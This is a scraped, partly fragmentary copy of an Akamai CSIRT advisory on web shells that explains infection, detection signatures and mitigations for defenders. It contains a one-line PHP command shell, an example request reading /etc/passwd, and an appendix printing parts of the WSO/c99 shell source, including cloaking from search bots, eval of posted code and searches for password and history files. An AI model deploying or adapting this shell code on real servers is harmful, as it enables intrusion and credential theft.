TLP Green: Recipients may share TLP: GREEN information with peers and partner organizations within their sector or community, but not via publicly accessible channels. Page 1 of 35 Akamai Technologies, Inc. (TLP:Green) ) Web Shells, Backdoor Trojans and RATs VERSION: 2013-0011
35
Embed
Web Shells, Backdoor Trojans and RATs - Akamai › uk › en › multimedia › documents › ... · The mod_security core rule set does include Rule ID 950922 Malicious_Software/Trojan
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
TLP Green: Recipients may share TLP: GREEN information with peers and partner organizations within their sector or community, but not via publicly accessible channels.
Page 1 of 35
Akamai Technologies, Inc. (TLP:Green) )
Web Shells, Backdoor Trojans and RATs
VERSION: 2013-0011
TLP Green: Recipients may share TLP: GREEN information with peers and partner organizations within their sector or community, but not via publicly accessible channels.
Page 2 of 35
Akamai Technologies, Inc. (TLP:Green) )
EXECUTIVE SUMMARY A Web shell is executable code running on a server that gives an attacker remote access to functions of the server. A Web shell can also be seen as a type of Remote Access Tool (RAT) or backdoor Trojan file. Web shells can be written in any language that a server supports and some of the most common are PHP and .NET languages. These shells can be extremely small, needing only a single line of code or can be full featured with thousands of lines. Some are self-sufficient and contain all needed functionality while others require external actions or a “Command and Control” (C&C) client for interaction. Web shells are installed on a Web server through a compromise of some kind. The compromise could be through a legitimate Web application on the server using techniques like SQL injection, Remote File Inclusion, an unvalidated file upload feature or through a valid user’s stolen credentials. When the shell is installed, it will have the same permissions and abilities as the user who put it on the server. To mitigate a Web shell infection, the server administrator will need to identify and delete the relevant files. This advisory does include a suggested WAF rule that will look for some of the signatures of common shells.
VULNERABILITY AND ATTACK DETAILS A Web shell is a type of interface that allows a malicious user to bypass security controls and interact directly with the Web server and potentially the operating system itself. The shell may be a full-featured administrative GUI or as simple as a single line of code that simply takes commands through a browser’s URL field and passes them on to the back-end server. A Simple Shell (Custom) A PHP shell can be as simple as:
<?php passthru($_GET[‘x’]; ?> If an attacker can get this line of code into a file on the Web server that has PHP running and hasn’t blocked the passthru() function, he can then issue system commands through a browser. If this line is saved in a file named foo.php on the http://www.example.com Web site, he would issue commands through the PHP $_GET variable in the URL. Example:
http://www.example.com/file.php?x=cat%20%2Fetc%2Fpasswd The PHP passthru function, or the similarly functioning eval(), exec() and system() are functions that will take a string and send the string to the underlying system for processing. The above request will take the value of x, urldecode it and send the command: cat /etc/passwd to the operating system. If the file permissions allow it, the browser will then display the contents of the /etc/passwd file or any other file the attacker wishes to view. If the server is running PHP and doesn’t have a demonstrated need for the passthru, eval, exec or system functions, it would be wise to disable these, making it difficult for these shells to operate. A Full-Featured Shell (c99madshell) One of the most common PHP Web shells seen is the c99madshell. It is approximately 1,500 lines long and some of its features include displaying security measures the server may have in place, a file viewer that includes the files’ permissions, an area where the user can run custom PHP code on the server, and the contents of phpinfo(). Phpinfo() is a core PHP function that creates a Web page and outputs valuable information about the OS, Web server and PHP configurations. It also has the ability to search the server for configuration files, password files and other writeable files and directories. It also has tools built in to encode/decode strings from various formats as well as a bruteforce password cracker. It has a GUI to directly connect to a database server and if the attacker is concerned about detection, it has a function to self-delete the shell. One of these shells can be installed through any of the same methods as described above, SQL injection, Remote File Inclusion, file upload functionality that doesn’t validate or direct account access. When the file is installed by the attacker, it will often be installed with the Web server’s permissions levels. Any abilities that have been given to the Web server, including reading files
TLP Green: Recipients may share TLP: GREEN information with peers and partner organizations within their sector or community, but not via publicly accessible channels.
Page 3 of 35
Akamai Technologies, Inc. (TLP:Green) )
outside the Web hierarchy or writing files, will also then be permitted to the attacker’s Web shell. Two valuable abilities for the attacker using this shell is to search the server and to change timestamps. Editing the server’s find and touch functions so the Web server user cannot use them will severely hamper the attacker’s abilities on the server.
Sample code for this type of shell is included below in the Appendix. Thick Client Shell We have also seen a hybrid between the simple shell and the full-featured shell. Some shells have a type of command and control (C&C) structure. The attacker has their own local interface where they can simply type in the URL of a compromised machine and insert code similar to the simple shell. The benefit here is the footprint on the infected server is extremely small, as small as 73 bytes, and doesn’t include code that is being picked up by anti-virus scanners. (http://www.fireeye.com/blog/technical/botnet-activities-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html) One such shell, named “China Chopper” has been described to be a single line of code inserted on a machine and then from the remote client has capabilities including password brute-forcing, file management, database management and a virtual terminal. (http://www.fireeye.com/blog/technical/botnet-activities-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html)
HOW DO I KNOW I’M AFFECTED Some of the signs that your site might be affected with a Web shell are if you get periodic times of high site usage from search engines. One of the purposes of a Web shell is to spread malware or spam. Attackers have been known to use their shell to alter or create .htaccess files on a server that will funnel search engine requests to the pages with malware or spam. With enough of these shell infections, a site could eventually suffer a DoS attack from the search engine processes. Due to their simplicity and acting like any other Web page, shells can be very stealthy on a server and be very difficult to detect. Some of the other things that can indicate the presence of a shell are files that seem out of place or have an unusual timestamp. While some attackers are extremely careful with their file names and timestamps, others do get careless and may give their shell an
TLP Green: Recipients may share TLP: GREEN information with peers and partner organizations within their sector or community, but not via publicly accessible channels.
Page 4 of 35
Akamai Technologies, Inc. (TLP:Green) )
obvious name like “shell.php” or “file.php”. The timestamp may be a tip-off in that it may pre-date the server’s existence or have a different time than every other file in a directory when they all should match. A system administrator can also periodically do a search of all files in the web root hierarchy looking for the functions that a shell depends on, such as the eval(), passthru(), exec() and system() if running PHP or the equivalent in the supported languages. Logs can also indicate there is a shell on a server and in use. Watch for unusual requests to files when the requests do not correlate or don’t make sense by protocol. A PDF or JPG file being called with GET parameters could be an indication the file extension is not accurate and that it is actually a Web shell. With WAF rules turned on and watching for characteristics of requests and responses with a shell, you can get an indication of a Web shell in use and determine its location on the server.
HOW DO I FIX THE PROBLEM The main goal is to prevent a shell from getting on a server in the first place. The methods of infection include SQL injection and remote file inclusion through a vulnerable Web application. With frequent testing and monitoring, these vectors can be minimized. For all types of shells, a search engine can be extremely helpful. Often, the shells will be used to spread malware onto a server and the search engines are able to see it. But some check the User-Agent and will display differently for a search engine spider than for a regular user. To find a shell, you may need to change your User-Agent to one of the search engine bots. Some browsers have plugins that allow you to easily switch a User-Agent. Once the shell is detected, simply delete the file from the server. If a c99madshell does make its way onto the server, it may have certain characteristics when the remote client interacts with it. It may issue a GET request that includes the parameter “FilesMan”. In a response parameter, it may include “WSO” in between the HTML <title></title> tags and may include an HTML form with a parameter of “name=mf”. Also, this shell includes a link for www.exploit-db.com. If there is no usual reason for your site to be a referrer to exploit-db.com, you can flag this as a possible shell detection. It would have a high potential for false positive if it is normal for users in your organization to go to the exploit-db.com site. Additionally, a custom rule can be created in WAF that would look for these in source, if the client does not feel they are normal and valid functions for the environment. If a China Chopper shell does make its way onto the server, it may have certain characteristics when the remote client interacts with it. In a POST request, the client will include the content “FromBase64String” and include the parameter “z***” where the asterisks are numbers. It may include any number between 1 and 999 after the z. Set file permissions in a way that will limit the damage that an attacker can do. Be aware of which users should have access to which files and set the file permissions accordingly. Do not allow the Web server to read operating system configuration files. Specify which directories should allow file uploads and only those should allow the Web server to write into them. Make certain that files cannot be executed in that directory so if malicious code is uploaded, it can’t be run. No other files or directories should be writeable by the Web server. The mod_security core rule set does include Rule ID 950922 Malicious_Software/Trojan which detects against some Web shells. That rule can be modified to add additional shell signatures if needed. Many times, Web shells will set off WAF file inclusion (LFI or RFI) and command injection rules as they do maintenance on themselves. Starting from WAF rule firing, look at other requests from the same source IP address, paying attention to the query string, looking for file inclusion or command injection.
REFERENCES & RELATED READING China Chopper Part 1 – http://www.fireeye.com/blog/technical/botnet-activities-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html China Chopper Part 2 – http://www.fireeye.com/blog/technical/botnet-activities-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html Keith Tyler on China Chopper – http://informationonsecurity.blogspot.com/2012/11/china-chopper-webshell.html
TLP Green: Recipients may share TLP: GREEN information with peers and partner organizations within their sector or community, but not via publicly accessible channels.
ABOUT AKAMAI CSIRT The Akamai Customer Security Incident Response Team (CSIRT) researches attack techniques and tools used to target our customers and develops the appropriate response – protecting customers from a wide variety of attacks ranging from login abuse to scrapers to data breaches to DNS hijacking to distributed denial of service. It’s ultimate mission: keep customers safe. As part of that mission, Akamai CSIRT maintains close contact with peer organizations around the world, trains Akamai's PS and CCare to recognize and counter attacks from a wide range of adversaries, and keeps customers informed by issuing advisories, publishing threat intelligence and conducting briefings.
CONTACTS Existing customers that desire additional information can contact Akamai directly through CCare at 1-877-4-AKATEC (US And Canada) or 617-444-4699 (International), their Engagement Manager, or their account team. Non-customers can submit inquiries through Akamai’s hotline at 1.877.425.2624, the contact form on our website at http://www.akamai.com/html/forms/sales_form.html , the chat function on our website at http://www.akamai.com/ or on twitter @akamai .
APPENDIX This is version 2.5 of a c99madshell. Also referred to as c99 or just madshell. <?php $color = "#df5"; $default_action = 'FilesMan'; $default_use_ajax = true; $default_charset = 'Windows-1251'; if($argc == 3) { $_POST = unserialize(base64_decode($argv[1])); $_SERVER = unserialize(base64_decode($argv[2])); } if(!empty($_SERVER['HTTP_USER_AGENT'])) { $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 404 Not Found'); exit; } } @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @set_time_limit(0); @set_magic_quotes_runtime(0); @define('WSO_VERSION', '2.5'); if(get_magic_quotes_gpc()) { function WSOstripslashes($array) { return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array); }
TLP Green: Recipients may share TLP: GREEN information with peers and partner organizations within their sector or community, but not via publicly accessible channels.
TLP Green: Recipients may share TLP: GREEN information with peers and partner organizations within their sector or community, but not via publicly accessible channels.
Page 7 of 35
Akamai Technologies, Inc. (TLP:Green) )
); else $aliases = array( "List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \"config*\"", "find config* files in current dir" => "find . -type f -name \"config*\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" ); function wsoHeader() { if(empty($_POST['charset'])) $_POST['charset'] = $GLOBALS['default_charset']; global $color; echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" .
TLP Green: Recipients may share TLP: GREEN information with peers and partner organizations within their sector or community, but not via publicly accessible channels.
TLP Green: Recipients may share TLP: GREEN information with peers and partner organizations within their sector or community, but not via publicly accessible channels.
TLP Green: Recipients may share TLP: GREEN information with peers and partner organizations within their sector or community, but not via publicly accessible channels.
TLP Green: Recipients may share TLP: GREEN information with peers and partner organizations within their sector or community, but not via publicly accessible channels.
TLP Green: Recipients may share TLP: GREEN information with peers and partner organizations within their sector or community, but not via publicly accessible channels.
TLP Green: Recipients may share TLP: GREEN information with peers and partner organizations within their sector or community, but not via publicly accessible channels.
TLP Green: Recipients may share TLP: GREEN information with peers and partner organizations within their sector or community, but not via publicly accessible channels.
TLP Green: Recipients may share TLP: GREEN information with peers and partner organizations within their sector or community, but not via publicly accessible channels.
Page 15 of 35
Akamai Technologies, Inc. (TLP:Green) )
eval($_POST['p1']); echo htmlspecialchars(ob_get_clean()); } echo '</pre></div>'; wsoFooter(); } function actionFilesMan() { if (!empty ($_COOKIE['f'])) $_COOKIE['f'] = @unserialize($_COOKIE['f']); if(!empty($_POST['p1'])) { switch($_POST['p1']) { case 'uploadFile': if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) echo "Can't upload file!"; break; case 'mkdir': if(!@mkdir($_POST['p2'])) echo "Can't create new dir"; break; case 'delete': function deleteDir($path) { $path = (substr($path,-1)=='/') ? $path:$path.'/'; $dh = opendir($path); while ( ($item = readdir($dh) ) !== false) { $item = $path.$item; if ( (basename($item) == "..") || (basename($item) == ".") ) continue; $type = filetype($item); if ($type == "dir") deleteDir($item); else @unlink($item); } closedir($dh); @rmdir($path); } if(is_array(@$_POST['f'])) foreach($_POST['f'] as $f) { if($f == '..') continue; $f = urldecode($f); if(is_dir($f)) deleteDir($f); else @unlink($f); } break; case 'paste': if($_COOKIE['act'] == 'copy') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != ".."))
TLP Green: Recipients may share TLP: GREEN information with peers and partner organizations within their sector or community, but not via publicly accessible channels.
TLP Green: Recipients may share TLP: GREEN information with peers and partner organizations within their sector or community, but not via publicly accessible channels.
TLP Green: Recipients may share TLP: GREEN information with peers and partner organizations within their sector or community, but not via publicly accessible channels.
TLP Green: Recipients may share TLP: GREEN information with peers and partner organizations within their sector or community, but not via publicly accessible channels.
TLP Green: Recipients may share TLP: GREEN information with peers and partner organizations within their sector or community, but not via publicly accessible channels.
TLP Green: Recipients may share TLP: GREEN information with peers and partner organizations within their sector or community, but not via publicly accessible channels.
TLP Green: Recipients may share TLP: GREEN information with peers and partner organizations within their sector or community, but not via publicly accessible channels.
TLP Green: Recipients may share TLP: GREEN information with peers and partner organizations within their sector or community, but not via publicly accessible channels.
TLP Green: Recipients may share TLP: GREEN information with peers and partner organizations within their sector or community, but not via publicly accessible channels.
TLP Green: Recipients may share TLP: GREEN information with peers and partner organizations within their sector or community, but not via publicly accessible channels.
TLP Green: Recipients may share TLP: GREEN information with peers and partner organizations within their sector or community, but not via publicly accessible channels.
TLP Green: Recipients may share TLP: GREEN information with peers and partner organizations within their sector or community, but not via publicly accessible channels.
Page 27 of 35
Akamai Technologies, Inc. (TLP:Green) )
$this->type = $type; } function connect($host, $user, $pass, $dbname){ switch($this->type) { case 'mysql': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; break; case 'pgsql': $host = explode(':', $host); if(!$host[1]) $host[1]=5432; if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; break; } return false; } function selectdb($db) { switch($this->type) { case 'mysql': if (@mysql_select_db($db))return true; break; } return false; } function query($str) { switch($this->type) { case 'mysql': return $this->res = @mysql_query($str); break; case 'pgsql': return $this->res = @pg_query($this->link,$str); break; } return false; } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res; switch($this->type) { case 'mysql': return @mysql_fetch_assoc($res); break; case 'pgsql': return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch($this->type) { case 'mysql': return $this->query("SHOW databases"); break; case 'pgsql': return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); break; }
TLP Green: Recipients may share TLP: GREEN information with peers and partner organizations within their sector or community, but not via publicly accessible channels.
Page 28 of 35
Akamai Technologies, Inc. (TLP:Green) )
return false; } function listTables() { switch($this->type) { case 'mysql': return $this->res = $this->query('SHOW TABLES'); break; case 'pgsql': return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); break; } return false; } function error() { switch($this->type) { case 'mysql': return @mysql_error(); break; case 'pgsql': return @pg_last_error(); break; } return false; } function setCharset($str) { switch($this->type) { case 'mysql': if(function_exists('mysql_set_charset')) return @mysql_set_charset($str, $this->link); else $this->query('SET CHARSET '.$str); break; case 'pgsql': return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch($this->type) { case 'mysql': return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file")); break; case 'pgsql': $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '".addslashes($str)."';select file from wso2;"); $r=array(); while($i=$this->fetch()) $r[] = $i['file']; $this->query('drop table wso2'); return array('file'=>implode("\n",$r)); break; } return false; }
TLP Green: Recipients may share TLP: GREEN information with peers and partner organizations within their sector or community, but not via publicly accessible channels.
TLP Green: Recipients may share TLP: GREEN information with peers and partner organizations within their sector or community, but not via publicly accessible channels.
TLP Green: Recipients may share TLP: GREEN information with peers and partner organizations within their sector or community, but not via publicly accessible channels.
TLP Green: Recipients may share TLP: GREEN information with peers and partner organizations within their sector or community, but not via publicly accessible channels.
TLP Green: Recipients may share TLP: GREEN information with peers and partner organizations within their sector or community, but not via publicly accessible channels.
TLP Green: Recipients may share TLP: GREEN information with peers and partner organizations within their sector or community, but not via publicly accessible channels.
TLP Green: Recipients may share TLP: GREEN information with peers and partner organizations within their sector or community, but not via publicly accessible channels.
Page 35 of 35
Akamai Technologies, Inc. (TLP:Green) )
Akamai® is the leading cloud platform for helping enterprises provide secure, high-‐performing user experiences on any device, anywhere. At the core of the Company’s solutions is the Akamai Intelligent Platform™ providing extensive reach, coupled with unmatched reliability, security, visibility and expertise. Akamai removes the complexities of connecting the increasingly mobile world, supporting 24/7 consumer demand, and enabling enterprises to securely leverage the cloud. To learn more about how Akamai is accelerating the pace of innovation in a hyperconnected world, please visit www.akamai.com and follow @Akamai on Twitter.
Akamai Technologies, Inc.
International Offices Unterfoehring, Germany Paris, France Milan, Italy London, England Madrid, Spain Stockholm, Sweden
U.S. Headquarters 8 Cambridge Center Cambridge, MA 02142 Tel 617.444.3000 Fax 617.444.3001 U.S. toll-free 877.4AKAMAI 877.425.2624
www.akamai.com
Bangalore, India Sydney, Australia Beijing, China Tokyo, Japan Seoul, Korea Singapore